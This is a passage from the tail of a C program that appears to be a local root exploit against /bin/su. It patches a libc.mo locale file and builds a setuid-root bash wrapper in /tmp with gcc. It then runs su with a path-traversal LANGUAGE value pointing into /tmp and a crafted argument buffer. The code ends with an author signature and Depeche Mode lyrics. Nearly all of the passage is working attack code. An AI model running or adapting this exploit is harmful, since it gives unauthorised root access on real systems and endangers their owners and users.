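      lseek(fd, st.st_size - 2, SEEK_SET) < 0 ||
      write(fd, "\0\0\0\0\0\0", 6) != 6) {
    perror("patching libc.mo");
    close(fd);
    return 1;
  }
  close(fd);

  /* /tmp/sh: what the shellcode execs -- a setuid(0)/setgid(0) wrapper
   * around /bin/bash, compiled on the spot with whatever gcc is on PATH. */
  if (!(fp = fopen("/tmp/sh.c", "w+"))) {
    printf("Skript kidies ?\n");
    perror("fopen /tmp/sh.c");
    return 1;
  }
  fputs(sh, fp);
  if (fclose(fp) != 0) {
    perror("fclose /tmp/sh.c");
    return 1;
  }
  if (system("cd /tmp;gcc sh.c -o sh") != 0) {
    fprintf(stderr, "building /tmp/sh failed\n");
    return 1;
  }

  env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
  env[1] = NULL;

  execle("/bin/su", "su", "-u", buff, (char *)NULL, env);
  perror("execle");                   /* only reached if the exec failed */
  return 1;
}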
- z33d -

--
		  Freestate
		Let yourself go
		Let yourself go
		Let your senses overflow

		Step out of your cage
		And onto the stage
		It's time to start
		Playing your part
		Freedom awaits
		Open the gates
		Open your mind
		Freedom's a state
			/ Depeche Mode